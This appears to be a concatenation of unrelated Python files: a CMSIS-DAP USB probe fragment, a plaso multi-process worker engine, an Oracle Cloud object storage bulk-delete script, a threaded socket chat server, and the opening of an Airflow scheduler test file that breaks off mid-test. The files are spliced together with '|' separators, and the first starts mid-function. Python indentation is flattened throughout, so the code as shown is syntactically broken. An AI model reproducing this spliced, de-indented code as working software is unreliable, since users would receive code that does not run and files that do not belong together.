if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
LOG.warning(msg)
else:
LOG.debug(msg)
elif error.errno == errno.ENOENT:
# This error happens on devices that don't have an interface description string.
pass
else:
LOG.debug("Error accessing USB device (VID=%04x PID=%04x): %s",
dev.idVendor, dev.idProduct, error)
return False
except (IndexError, NotImplementedError) as error:
LOG.debug("Error accessing USB device (VID=%04x PID=%04x): %s", dev.idVendor, dev.idProduct, error)
return False
if cmsis_dap_interface is None:
return False
# Check the class and subclass are vendor-specific.
if (cmsis_dap_interface.bInterfaceClass != 0xff) or (cmsis_dap_interface.bInterfaceSubClass != 0):
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
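# Hedged sketch: list CMSIS-DAPv2 probes using the interface above. It assumes
# pyusb/libusb are installed and simply prints whichever compatible probes are attached.
if __name__ == "__main__":
    for probe in PyUSBv2.get_all_connected_interfaces():
        print("Found %s %s (serial %s)" % (
            probe.vendor_name, probe.product_name, probe.serial_number))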
|
engine.py
|
# -*- coding: utf-8 -*-
"""The multi-process processing engine."""
import abc
import ctypes
import os
import signal
import sys
import threading
import time
from plaso.engine import engine
from plaso.engine import process_info
from plaso.lib import definitions
from plaso.multi_process import logger
from plaso.multi_process import plaso_xmlrpc
class MultiProcessEngine(engine.BaseEngine):
"""Multi-process engine base.
This class contains functionality to:
* monitor and manage worker processes;
  * retrieve process status information via RPC;
* manage the status update thread.
"""
# Note that on average Windows seems to require a longer wait.
_RPC_SERVER_TIMEOUT = 8.0
_MAXIMUM_RPC_ERRORS = 10
# Maximum number of attempts to try to start a replacement worker process.
_MAXIMUM_REPLACEMENT_RETRIES = 3
# Number of seconds to wait between attempts to start a replacement worker
# process
_REPLACEMENT_WORKER_RETRY_DELAY = 1
_PROCESS_JOIN_TIMEOUT = 5.0
_ZEROMQ_NO_WORKER_REQUEST_TIME_SECONDS = 300
def __init__(self):
"""Initializes a multi-process engine."""
super(MultiProcessEngine, self).__init__()
self._debug_output = False
self._name = 'Main'
self._log_filename = None
self._pid = os.getpid()
self._process_information = process_info.ProcessInfo(self._pid)
self._process_information_per_pid = {}
self._processes_per_pid = {}
self._quiet_mode = False
self._rpc_clients_per_pid = {}
self._rpc_errors_per_pid = {}
self._status_update_active = False
self._status_update_callback = None
self._status_update_thread = None
self._storage_writer = None
self._worker_memory_limit = definitions.DEFAULT_WORKER_MEMORY_LIMIT
def _AbortJoin(self, timeout=None):
"""Aborts all registered processes by joining with the parent process.
Args:
timeout (int): number of seconds to wait for processes to join, where
None represents no timeout.
"""
for pid, process in self._processes_per_pid.items():
logger.debug('Waiting for process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
process.join(timeout=timeout)
if not process.is_alive():
logger.debug('Process {0:s} (PID: {1:d}) stopped.'.format(
process.name, pid))
def _AbortKill(self):
"""Aborts all registered processes by sending a SIGKILL or equivalent."""
for pid, process in self._processes_per_pid.items():
if not process.is_alive():
continue
logger.warning('Killing process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
self._KillProcess(pid)
def _AbortTerminate(self):
"""Aborts all registered processes by sending a SIGTERM or equivalent."""
for pid, process in self._processes_per_pid.items():
if not process.is_alive():
continue
logger.warning('Terminating process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
process.terminate()
def _CheckStatusWorkerProcess(self, pid):
"""Checks the status of a worker process.
If a worker process is not responding the process is terminated and
a replacement process is started.
Args:
pid (int): process ID (PID) of a registered worker process.
Raises:
KeyError: if the process is not registered with the engine.
"""
# TODO: Refactor this method, simplify and separate concerns (monitoring
# vs management).
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
process_status = self._QueryProcessStatus(process)
    process_is_alive = process_status is not None
process_information = self._process_information_per_pid[pid]
used_memory = process_information.GetUsedMemory() or 0
if self._worker_memory_limit and used_memory > self._worker_memory_limit:
logger.warning((
'Process: {0:s} (PID: {1:d}) killed because it exceeded the '
'memory limit: {2:d}.').format(
process.name, pid, self._worker_memory_limit))
self._KillProcess(pid)
if isinstance(process_status, dict):
self._rpc_errors_per_pid[pid] = 0
status_indicator = process_status.get('processing_status', None)
else:
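      # The RPC status query failed; count consecutive failures and treat the
      # worker as dead once _MAXIMUM_RPC_ERRORS is exceeded.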
rpc_errors = self._rpc_errors_per_pid.get(pid, 0) + 1
self._rpc_errors_per_pid[pid] = rpc_errors
if rpc_errors > self._MAXIMUM_RPC_ERRORS:
process_is_alive = False
if process_is_alive:
rpc_port = process.rpc_port.value
logger.warning((
'Unable to retrieve process: {0:s} (PID: {1:d}) status via '
'RPC socket: http://localhost:{2:d}').format(
process.name, pid, rpc_port))
processing_status_string = 'RPC error'
status_indicator = definitions.STATUS_INDICATOR_RUNNING
else:
processing_status_string = 'killed'
status_indicator = definitions.STATUS_INDICATOR_KILLED
process_status = {
'processing_status': processing_status_string}
self._UpdateProcessingStatus(pid, process_status, used_memory)
    # _UpdateProcessingStatus can also change the status of the worker,
    # so refresh the status if applicable.
for worker_status in self._processing_status.workers_status:
if worker_status.pid == pid:
status_indicator = worker_status.status
break
if status_indicator in definitions.ERROR_STATUS_INDICATORS:
logger.error((
'Process {0:s} (PID: {1:d}) is not functioning correctly. '
'Status code: {2!s}.').format(process.name, pid, status_indicator))
self._TerminateProcessByPid(pid)
replacement_process = None
for replacement_process_attempt in range(
self._MAXIMUM_REPLACEMENT_RETRIES):
logger.info((
'Attempt: {0:d} to start replacement worker process for '
'{1:s}').format(replacement_process_attempt + 1, process.name))
replacement_process = self._StartWorkerProcess(process.name)
if replacement_process:
break
time.sleep(self._REPLACEMENT_WORKER_RETRY_DELAY)
if not replacement_process:
logger.error(
'Unable to create replacement worker process for: {0:s}'.format(
process.name))
def _KillProcess(self, pid):
"""Issues a SIGKILL or equivalent to the process.
Args:
pid (int): process identifier (PID).
"""
if sys.platform.startswith('win'):
process_terminate = 1
handle = ctypes.windll.kernel32.OpenProcess(
process_terminate, False, pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
try:
os.kill(pid, signal.SIGKILL)
except OSError as exception:
logger.error('Unable to kill process {0:d} with error: {1!s}'.format(
pid, exception))
def _QueryProcessStatus(self, process):
"""Queries a process to determine its status.
Args:
process (MultiProcessBaseProcess): process to query for its status.
Returns:
dict[str, str]: status values received from the worker process.
"""
process_is_alive = process.is_alive()
if process_is_alive:
rpc_client = self._rpc_clients_per_pid.get(process.pid, None)
process_status = rpc_client.CallFunction()
else:
process_status = None
return process_status
def _RaiseIfNotMonitored(self, pid):
"""Raises if the process is not monitored by the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not monitored by the engine.
"""
if pid not in self._process_information_per_pid:
raise KeyError(
'Process (PID: {0:d}) not monitored by engine.'.format(pid))
def _RaiseIfNotRegistered(self, pid):
"""Raises if the process is not registered with the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not registered with the engine.
"""
if pid not in self._processes_per_pid:
raise KeyError(
'Process (PID: {0:d}) not registered with engine'.format(pid))
def _RegisterProcess(self, process):
"""Registers a process with the engine.
Args:
process (MultiProcessBaseProcess): process.
Raises:
KeyError: if the process is already registered with the engine.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
if process.pid in self._processes_per_pid:
raise KeyError(
'Already managing process: {0!s} (PID: {1:d})'.format(
process.name, process.pid))
self._processes_per_pid[process.pid] = process
# pylint: disable=redundant-returns-doc
@abc.abstractmethod
def _StartWorkerProcess(self, process_name):
"""Creates, starts, monitors and registers a worker process.
Args:
process_name (str): process name.
Returns:
MultiProcessWorkerProcess: extraction worker process.
"""
def _StartMonitoringProcess(self, process):
"""Starts monitoring a process.
Args:
process (MultiProcessBaseProcess): process.
Raises:
IOError: if the RPC client cannot connect to the server.
KeyError: if the process is not registered with the engine or
if the process is already being monitored.
OSError: if the RPC client cannot connect to the server.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
pid = process.pid
if pid in self._process_information_per_pid:
raise KeyError(
'Already monitoring process (PID: {0:d}).'.format(pid))
if pid in self._rpc_clients_per_pid:
raise KeyError(
'RPC client (PID: {0:d}) already exists'.format(pid))
rpc_client = plaso_xmlrpc.XMLProcessStatusRPCClient()
# Make sure that a worker process has started its RPC server.
# The RPC port will be 0 if no server is available.
rpc_port = process.rpc_port.value
time_waited_for_process = 0.0
while not rpc_port:
time.sleep(0.1)
rpc_port = process.rpc_port.value
time_waited_for_process += 0.1
if time_waited_for_process >= self._RPC_SERVER_TIMEOUT:
raise IOError(
'RPC client unable to determine server (PID: {0:d}) port.'.format(
pid))
hostname = 'localhost'
if not rpc_client.Open(hostname, rpc_port):
raise IOError((
'RPC client unable to connect to server (PID: {0:d}) '
'http://{1:s}:{2:d}').format(pid, hostname, rpc_port))
self._rpc_clients_per_pid[pid] = rpc_client
self._process_information_per_pid[pid] = process_info.ProcessInfo(pid)
def _StartStatusUpdateThread(self):
"""Starts the status update thread."""
self._status_update_active = True
self._status_update_thread = threading.Thread(
name='Status update', target=self._StatusUpdateThreadMain)
self._status_update_thread.start()
def _StatusUpdateThreadMain(self):
"""Main function of the status update thread."""
while self._status_update_active:
self._UpdateStatus()
time.sleep(self._STATUS_UPDATE_INTERVAL)
def _StopMonitoringProcess(self, process):
"""Stops monitoring a process.
Args:
process (MultiProcessBaseProcess): process.
Raises:
KeyError: if the process is not monitored.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
pid = process.pid
self._RaiseIfNotMonitored(pid)
del self._process_information_per_pid[pid]
rpc_client = self._rpc_clients_per_pid.get(pid, None)
if rpc_client:
rpc_client.Close()
del self._rpc_clients_per_pid[pid]
if pid in self._rpc_errors_per_pid:
del self._rpc_errors_per_pid[pid]
logger.debug('Stopped monitoring process: {0:s} (PID: {1:d})'.format(
process.name, pid))
def _StopMonitoringProcesses(self):
"""Stops monitoring all processes."""
# We need to make a copy of the list of pids since we are changing
# the dict in the loop.
for pid in list(self._process_information_per_pid.keys()):
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
self._StopMonitoringProcess(process)
def _StopStatusUpdateThread(self):
"""Stops the status update thread."""
if self._status_update_thread:
self._status_update_active = False
if self._status_update_thread.is_alive():
self._status_update_thread.join()
self._status_update_thread = None
# Update the status view one last time so we have the latest worker process
# status information.
self._UpdateStatus()
def _TerminateProcessByPid(self, pid):
"""Terminate a process that's monitored by the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not registered with and monitored by the
engine.
"""
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
self._TerminateProcess(process)
self._StopMonitoringProcess(process)
def _TerminateProcess(self, process):
"""Terminate a process.
Args:
process (MultiProcessBaseProcess): process to terminate.
"""
pid = process.pid
logger.warning('Terminating process: (PID: {0:d}).'.format(pid))
process.terminate()
# Wait for the process to exit.
process.join(timeout=self._PROCESS_JOIN_TIMEOUT)
if process.is_alive():
logger.warning('Killing process: (PID: {0:d}).'.format(pid))
self._KillProcess(pid)
@abc.abstractmethod
def _UpdateProcessingStatus(self, pid, process_status, used_memory):
"""Updates the processing status.
Args:
pid (int): process identifier (PID) of the worker process.
process_status (dict[str, object]): status values received from
the worker process.
used_memory (int): size of used memory in bytes.
Raises:
KeyError: if the process is not registered with the engine.
"""
@abc.abstractmethod
def _UpdateStatus(self):
"""Updates the status."""
|
object_storage_bulk_delete.py
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
##########################################################################
# object_storage_bulk_delete.py
#
# @author: Adi Zohar
#
# Supports Python 3
##########################################################################
# Info:
# Bulk delete with parallel threads
#
##########################################################################
# Application Command line parameters
#
# -c config_file - Config file to use (default=~/.oci/config)
# -t profile - Profile in config file, DEFAULT as default
# -p proxy - Set Proxy (i.e. www-proxy-server.com:80)
# -ip - Use Instance Principals for Authentication
# -dt - Use Instance Principals with delegation token for cloud shell
# -sb source_bucket - Source Bucket Name
# -sp source_prefix - Source Prefix Include
# -se source_prefix_exclude - Source Prefix Exclude
# -exclude_dirs - Exclude Directories
# -sr source_region - Source Region
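#
# Example invocation (hypothetical bucket and profile names, for illustration only):
#   python object_storage_bulk_delete.py -t DEFAULT -sb my-bucket -sp logs/2021/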
##########################################################################
import threading
import time
import queue
import oci
import argparse
import datetime
import sys
import click
import os
##########################################################################
# Pre Main
##########################################################################
# Get Command Line Parser
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
parser.add_argument('-p', default="", dest='proxy', help='Set Proxy (i.e. www-proxy-server.com:80) ')
parser.add_argument('-ip', action='store_true', default=False, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-c', default="", dest='config_file', help="Config File (default=~/.oci/config)")
parser.add_argument('-sb', default="", dest='source_bucket', help='Source Bucket Name')
parser.add_argument('-sp', default="", dest='source_prefix', help='Source Prefix Include')
parser.add_argument('-se', default="", dest='source_prefix_exclude', help='Source Prefix Exclude')
parser.add_argument('-exclude_dirs', action='store_true', default=False, dest='source_exclude_dirs', help='Exclude Directories')
parser.add_argument('-sr', default="", dest='source_region', help='Source Region')
cmd = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
raise SystemExit
if not cmd.source_bucket:
print("Source bucket parameter is required !!!\n")
parser.print_help()
raise SystemExit
source_bucket = cmd.source_bucket
source_prefix = cmd.source_prefix
# Parameters
worker_count = 40
status_interval = 60
base_retry_timeout = 2
max_retry_timeout = 16**2
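# Note: worker() squares interval_exp after each failed delete attempt, so it
# backs off at 2, 4, 16 and 256 seconds and re-raises the error once the
# interval exceeds max_retry_timeout.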
# global queue
q = queue.Queue()
# Global Variables
object_storage_client = None
source_namespace = ""
source_bucket = cmd.source_bucket
source_prefix = cmd.source_prefix
source_prefix_exclude = cmd.source_prefix_exclude
source_region = cmd.source_region
source_exclude_dirs = cmd.source_exclude_dirs
# Update Variables based on the parameters
config_file = (cmd.config_file if cmd.config_file else oci.config.DEFAULT_LOCATION)
config_profile = (cmd.config_profile if cmd.config_profile else oci.config.DEFAULT_PROFILE)
##########################################################################
# Create signer for Authentication
# Input - config_file, config_profile and is_instance_principals and is_delegation_token
# Output - config and signer objects
##########################################################################
def create_signer(config_file, config_profile, is_instance_principals, is_delegation_token):
# if instance principals authentications
if is_instance_principals:
try:
signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
config = {'region': signer.region, 'tenancy': signer.tenancy_id}
return config, signer
except Exception:
print_header("Error obtaining instance principals certificate, aborting")
raise SystemExit
# -----------------------------
# Delegation Token
# -----------------------------
elif is_delegation_token:
try:
# check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them
env_config_file = os.environ.get('OCI_CONFIG_FILE')
env_config_section = os.environ.get('OCI_CONFIG_PROFILE')
# check if file exist
if env_config_file is None or env_config_section is None:
print("*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***")
print("")
raise SystemExit
config = oci.config.from_file(env_config_file, env_config_section)
delegation_token_location = config["delegation_token_file"]
with open(delegation_token_location, 'r') as delegation_token_file:
delegation_token = delegation_token_file.read().strip()
# get signer from delegation token
signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)
return config, signer
except KeyError:
print("* Key Error obtaining delegation_token_file")
raise SystemExit
except Exception:
raise
# -----------------------------
# config file authentication
# -----------------------------
else:
config = oci.config.from_file(
(config_file if config_file else oci.config.DEFAULT_LOCATION),
(config_profile if config_profile else oci.config.DEFAULT_PROFILE)
)
signer = oci.signer.Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=oci.config.get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
return config, signer
##############################################################################
# get time
##############################################################################
def get_time(full=False):
if full:
return str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
else:
return str(datetime.datetime.now().strftime("%H:%M:%S"))
##########################################################################
# Print header centered
##########################################################################
def print_header(name):
    chars = 90
print("")
print('#' * chars)
print("#" + name.center(chars - 2, " ") + "#")
print('#' * chars)
##########################################################################
# Print Info
##########################################################################
def print_command_info():
print_header("Running Object Storage Bulk Delete")
print("Written by Adi Zohar, July 2020")
print("Starts at : " + get_time(full=True))
print("Command Line : " + ' '.join(x for x in sys.argv[1:]))
print("Source Namespace : " + source_namespace)
print("Source Bucket : " + source_bucket)
print("Source Prefix Include : " + source_prefix)
print("Source Prefix Exclude : " + source_prefix_exclude)
print("Source Region : " + source_region)
if source_exclude_dirs:
print("Source Exclude Dirs : True")
##############################################################################
# Worker
##############################################################################
def worker():
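    # Each worker pulls object names from the shared queue and requests deletion,
    # retrying failures with the exponential backoff described above.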
while True:
object_ = q.get()
interval_exp = base_retry_timeout
while True:
response = None
try:
response = object_storage_client.delete_object(source_namespace, source_bucket, object_)
break
except Exception as e:
                # Treat HTTP 400 as non-retryable; getattr guards exceptions without a status attribute.
                if getattr(e, 'status', None) == 400:
break
if interval_exp > max_retry_timeout:
print(" ERROR: Failed to request delete of %s" % (object_))
raise
if response:
print(" Received %s from API for object %s, will wait %s seconds before retrying." % (response.status, object_, interval_exp))
else:
print(" Received error from API for object %s, will wait %s seconds before retrying." % (object_, interval_exp))
time.sleep(interval_exp)
interval_exp **= 2
continue
q.task_done()
##############################################################################
# Add object to Q
##############################################################################
def add_objects_to_queue(ns, source_bucket):
global q
count = 0
next_starts_with = None
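    # list_objects returns results in pages; pass next_start_with back on each
    # call until the service stops returning a continuation token.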
while True:
response = object_storage_client.list_objects(ns, source_bucket, start=next_starts_with, prefix=source_prefix, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
next_starts_with = response.data.next_start_with
for object_ in response.data.objects:
if source_prefix_exclude and object_.name.startswith(source_prefix_exclude):
continue
if source_exclude_dirs and "/" in object_.name:
continue
q.put(object_.name)
count += 1
if count % 100000 == 0:
print(get_time() + " - Added " + str(count) + " files to queue...")
if not next_starts_with:
break
return count
##############################################################################
# connect to object storage
##############################################################################
def connect_to_object_storage():
global source_namespace
global object_storage_client
global source_region
# get signer
config, signer = create_signer(cmd.config_file, cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
# if region is specified
if source_region:
config['region'] = source_region
else:
source_region = config['region']
try:
# connect and fetch namespace
print("\nConnecting to Object Storage Service...")
object_storage_client = oci.object_storage.ObjectStorageClient(config, signer=signer)
if cmd.proxy:
object_storage_client.base_client.session.proxies = {'https': cmd.proxy}
# retrieve namespace from object storage
source_namespace = object_storage_client.get_namespace(retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
print("Succeed.")
except Exception as e:
print("\nError connecting to Object Storage - " + str(e))
raise SystemExit
##############################################################################
# Main
##############################################################################
def main():
# connect to object storage
connect_to_object_storage()
# command info
print_command_info()
if not click.confirm('\nAre you sure you want to continue deleting ?'):
raise SystemExit
print_header("Start Processing")
print(get_time() + " - Creating %s workers." % (worker_count))
for i in range(worker_count):
w = threading.Thread(target=worker)
w.daemon = True
w.start()
print(get_time() + " - Getting list of objects from source source_bucket (%s). delete will start immediately." % (source_bucket))
count = add_objects_to_queue(source_namespace, source_bucket)
print(get_time() + " - Enqueued %s objects to be deleted" % (count))
while count > 0:
print(get_time() + " - Waiting %s seconds before checking status." % (status_interval))
time.sleep(status_interval)
if q.qsize() == 0:
print(get_time() + " - deletion of all objects has been requested.")
break
else:
print(get_time() + " - %s object deletes remaining to requested." % (q.qsize()))
q.join()
print_header("Completed")
print("Completed at : " + get_time(True))
##############################################################################
# Execute
##############################################################################
if __name__ == '__main__':
main()
|
server.py
|
#!/usr/bin/env python3
"""Server for multithreaded (asynchronous) chat application."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the cave! Now type your name and press enter!", "utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client): # Takes client socket as argument.
"""Handles a single client connection."""
name = client.recv(BUFSIZ).decode("utf8")
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
clients[client] = name
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.bind(ADDR)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
    SERVER.close()
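# A minimal client sketch for manual testing (assumes this server is running on
# localhost:33000; the name and messages below are placeholders):
#
#   from socket import AF_INET, socket, SOCK_STREAM
#   client = socket(AF_INET, SOCK_STREAM)
#   client.connect(('localhost', 33000))
#   print(client.recv(1024).decode("utf8"))  # greeting sent by the server
#   client.send(bytes("Alice", "utf8"))      # reply with a name
#   client.send(bytes("Hello!", "utf8"))     # broadcast a message to the room
#   client.send(bytes("{quit}", "utf8"))     # ask the server to disconnect us
#   client.close()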
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.conf.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 20
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
    def execute(self, *args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
